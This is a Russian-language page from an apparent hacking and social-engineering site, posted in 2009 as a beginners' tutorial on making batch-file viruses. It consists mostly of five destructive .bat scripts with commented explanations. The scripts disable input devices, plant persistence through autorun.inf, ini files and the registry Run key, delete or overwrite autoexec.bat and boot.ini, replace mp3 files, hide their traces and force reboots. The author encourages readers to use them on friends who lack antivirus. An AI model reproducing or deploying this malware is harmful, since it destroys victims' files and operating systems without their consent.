Социальная инженерия от А до Я


Приветствую вас Гость | Главная | Наши статьи | Регистрация | Вход | RSS
Менюшка
Категории раздела
Новичкам [5]
Статьи для новичков в СИ
Схемы [1]
Наши схемы, которые можно применить в СИ
Теории [0]
Наши теории, не проверенные схемы, предположения.
Разное [3]
Статьи не вошедшие не в один из разделов.
Серчинг:
Облачко тегов:
схема угона icq Угон icq угон аси Отправка e-mail с подменой адреса Отправка писем с дургого адреса ошибки Подмена e-mail Примеры техники FAQ mIRC Наш канал основы термины Чат ICQ qip ася Анонимная отправка смс взлом e-mail взлом почты блюэтуз Взлом мобильного синий зуб Взлом в контакте Информационная разведка ИР просмотр закрытых данных в контакте Взлом архивов rar ZIP взлом
Главная » Статьи » Новичкам

Создание простеньких вирусов в формате *bat
Когда очень давно юзал множество порталов про вирусы, хакерство и тп. Давным-давно была темка на одном из порталов, делаем вирусы своими руками... не помню где, было давно, но некоторые скрипты у меня сохранились... ( к стати вы сами можете генерировать скрипты при помощи программы питон )

Ну как сделать вирус поясню в двух словах...

1) Открываем текстовый редактор "Блокнот" или кому там че удобно...

2) Вставляем туда скрипт ( скрипты выбираем ниже, на ваш вкус)

3) Жмем "Файл / Сохранить как / название.bat"

Если не понятно, задавайте вопросы...

Итак скрипты:

===================================
@echo off
rundll32 keyboard,disable
rundll32 mouse,disable
copy %0 %windir%/system
echo run=%windir%/system/*.bat >> win.ini
echo run=%windir%/system/*.bat >> system.ini
label LOHOLAMMER
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat > nul
echo autoexec.bat echo YOU ARE LAMMER…xe-xe-xe > c:\autoexec.bat
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject(»WScript.Shell»); > %temp%\mes.js
echo WSHShell.Popup(»Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе»); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
pause
cls

Пояснение этого скрипта:

1 @echo off – Запрещаем ДОСовскому окошку показывать, что делает скрипт.
2 rundll32 keyboard,disable – Отключаем клаву, на случай если юзер поймет что происходит и надумает нажать CTRL+C
3 rundll32 mouse,disable – Отключаем мышь тоже на всякий.
4 copy %0 %windir%/system – Копируемся в папку windows/system
// %0 – Переменная, указывающая на исходный файл-вирус
// %windir% – переменная папка масдая.
5 echo run=%windir%/system/*.bat >> %windir%\win.ini – Добавляет текст «run=%windir%/system/*.bat» в файл win.ini
6 echo run=%windir%/system/*.bat >> %windir%\system.ini – Добавляет текст «run=%windir%/system/*.bat» в файл system.ini
7 label LOHOLAMMER – Меняет имя диску c:\ на «LOHOLAMMER»
8 if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r – Проверяем если есть файл c:\autoexec.bat то убираем
//у него атрибуты -h -s -a -r
9 deltree /y c:\autoexec.bat – Удаляем файл c:\autoexec.bat , если не убрать атрибуты, то программа не удалит файл.
10 echo autoexec.bat echo YOU ARE LAMMER…xe-xe-xe > c:\autoexec.bat – Добавить текст «YOU ARE LAMMER…xe-xe-xe»
//в новый файл autoexec.bat
11 rundll32 mouse,enable – Включаем, пускай думает, что ниче не было.
12 rundll32 keyboard,enable – Включаем, пускай думает, что ниче не было.
13 echo var WSHShell = WScript.CreateObject(»WScript.Shell»); > %temp%\mes.js
echo WSHShell.Popup(»Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе»); >> %temp%\mes.js
start %temp%\mes.js. //Этот текст выводит масдайное окно с надписью
deltree /y %temp%\mes.js //А потом стирает за собой следы.
14 attrib c:\autoexec.bat +h +s +a +r – Делает файл c:\autoexec.bat скрытым и системный чтоб ламер ничего не заподозрил.
15 pause – Просим нажать любую клавишу (Не обязательно нажимать ведь вирь уже сделал свое дело.)
16 cls – Выходим

Эта программа, при следующей перезагрузке не даст загрузиться виндовсу и будет писать ‘Вы ламер.’ .Работает только в винде до 2000. Понимаю - это все старо, но... вдруг пригодиться...

==============================================

@echo off
rundll32 user,setcursorpos //Убираем с экрана курсор в левый угол
rundll32 keyboard,disable //Было
rundll32 mouse,disable //Было
rundll32 user,swapmousebutton. //Тут мы переставляем кнопки мыши
echo Обновление параметров системы, пожалуйста подождите… //пишет отмазку Smile
label mp_k //Меняем имя диску
copy mp_k.exe %windir% //Копирует себя в папку windows
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat
if exist c:\io.sys echo autoexec.bat echo YOU_ARE_LAMMER….[]=[_H@CKED_BY_[kas]*_»SmallPox_Vir_Org»_] > c:\autoexec.bat
echo run = %windir%\mp_k.exe >> %windir%\win.ini
echo run = %windir%\mp_k.exe >> %windir%\system.ini
echo [AutoRun] > c:\autorun.inf //Эти операции есть в прошлом вирусе.
echo open=c:\autoexec.bat > c:\autorun.inf
echo [AutoRun] > d:\autorun.inf
echo open=c:\autoexec.bat > d:\autorun.inf
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject(»WScript.Shell»); > %temp%\mes.js
echo WSHShell.Popup(»Warning,.. А теперь необходимо перезагрузиться»); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
attrib %windir%\mp_k.exe +h +s +a +r
attrib c:\autorun.inf +h +s +a +r
attrib d:\autorun.inf +h +s +a +r
deltree /y mp_k.exe
rmdir %windir%\temp //Удаляем папку temp
mkdir %windir%\temp //Создаем папку temp
cls

==========================================

@echo off
cls
echo Please wait, updating system…
ctty nul. //Это новая команда, она отключает вывод текста в окошке.
exist %WINDIR%\SYSTEM\VMM32\%0 goto :end //Если вирь уже запускался то пусть запустит себя снова.
copy %0 %WINDIR%\SYSTEM\VMM32
cd c:\ //Переходим в другую директорию
for %%a in (*.mp3 c:\*.mp3 c:\MUZ\*.mp3 c:\My Music\*.mp3 ..\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd My Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd My_Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd MyMusic
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Музыка
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Музон
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd MUZ
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd mp3
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd d:\
for %%a in (*.mp3 c:\*.mp3 c:\MUZ\*.mp3 c:\My Music\*.mp3 ..\*.mp3) do copy /y %0 %%a
cd My Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Тут тоже самое.
cd My_Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd MyMusic
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Музыка
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Музон
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd MUZ
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd mp3
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
:end //Метка
start /m /w %WINDIR%\SYSTEM\VMM32\%0 //Запуск в свернутом режиме
ctty con //Врубаем разрешение на показ текста в окне
echo Say goodbye your MP3 collection Smile) Virus [BAT.kas.a] //Прощальные строки
cls //Выход.

============================================

ctty nul //Было такое
REM Чй† Ђь@uoњPSQRVW
?
‹тЌ
» Q_ь№ у¦u=
є №є њъ.я?ђ л,ђ ///
copy %0 *.exe ///
copy %0 b.com>nul // Эта технология взята с вируса другово.
b.com. // Эти каракули перехватывают рабочие в данный момент файлы, и херит их.
del b.com. /// Это текст АСМ скомпиленого в exe
rem _^ZY[Xќњъ.я?ђ К ђђђђъ.я.ђ К ћ # @echoђё.5Н.Њ ' ‰?ђ Ќ ё.%Н.Ќ є Н'ђђ //
@echo off //
echo XEP_BAM //Пишем злобно и красиво.
if exist %windir%/%0.bat goto :end //Проверка виря на запускание, те был ли он запущен.
@rundll32 user,setcursorpos
ctty con //Было такое
echo Обновление параметров системы, пожалуйста подождите... //Отвлекаем.
@label BAT.c
copy %0.bat %windir% > nul
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
if exist c:\boot.ini attrib c:\boot.ini -h -s -a -r
deltree /y c:\autoexec.bat
deltree /y c:\boot.ini
if exist c:\autoexec.bat echo autoexec.bat echo YOU_ARE_LAMMER.... > c:\autoexec.bat
if exist c:\boot.ini echo autoexec.bat echo YOU_ARE_LAMMER.... > c:\boot.ini //Это для XP он там вместо autoexec.bat Wink
deltree /y %windir%/win.ini

copy %0 > %windir%/win.ini
deltree /y %windir%/system.ini
copy %0 > %windir%/system.ini
if exist c:\io.sys //Проверка наличия диска так как на каждом диске есть файл io.sys
echo [AutoRun] > c:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> c:\autorun.inf //И если он есть заразить его.
if exist d:\io.sys //Проверка наличия диска
echo [AutoRun] > d:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> d:\autorun.inf //И если он есть заразить его.
if exist e:\io.sys //Проверка наличия диска
echo [AutoRun] > e:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> e:\autorun.inf //И если он есть заразить его.
:end //Метка СМ начало.
cls //Выход

============================================

@echo off

echo Windows Registry Editor Version 5.00 > %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %temp%\run.reg
echo «svchost.exe»=»Buldozer.bat» >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents] >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL] >> %temp%\run.reg
echo «Installed»=»1″ >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI] >> %temp%\run.reg
echo «Installed»=»1″ >> %temp%\run.reg
echo «NoChange»=»1″ >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS] >> %temp%\run.reg
echo «Installed»=»1″ >> %temp%\run.reg

regedit /s %temp%\run.reg

del %temp%\run.reg

echo @echo off > %windir%\system32\Buldozer.bat%
>> %windir%\system32\Buldozer.bat%
echo Shutdown -r >> %windir%\system32\Buldozer.bat%

attrib +H %windir%\system32\Buldozer.bat

echo var WSHShell = WScript.CreateObject(»WScript.Shell»); > %temp%\mes.js
echo WSHShell.Popup(»теперь питание компьютера можно выключить»); >> %temp%\mes.js
start %temp%\mes.js
==============================================

Последний скрипт взял не сильно давно, но тоже где-то в нете...
Вообщем юзайте друзья мои... если есть вопросы, постараюсь пояснить, но батки уматовые))) многие сейчас не юзают Антивирусы ( сужу по своим друзьям ), поэтому дерзайте... сам при помощи этих виров не раз ложил друзьям винду)))

ПыСы Друзья мои, вместо смайликов которые отображаються в посте, вставляйте двоеточие и скобочку ":" и ")"

Источник: http://wwws.help-out.net/forum-f6/tema-t40.htm#104

Категория: Новичкам | Добавил: pr0grammer (25.08.2009) | Автор: Уалер4иГ
Просмотров: 1521 | Комментарии: 1 | Рейтинг: 3.0/1 |
Всего комментариев: 1
1  
Статья списана!

Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
Опрос
Как вы попали к нам на сайт?
Всего ответов: 123
Друзья сайта:
Полигон испытаний СИ для новичков

Samorg © 2017 - - Дизайн эксклюзивно от www.w2u.net.ru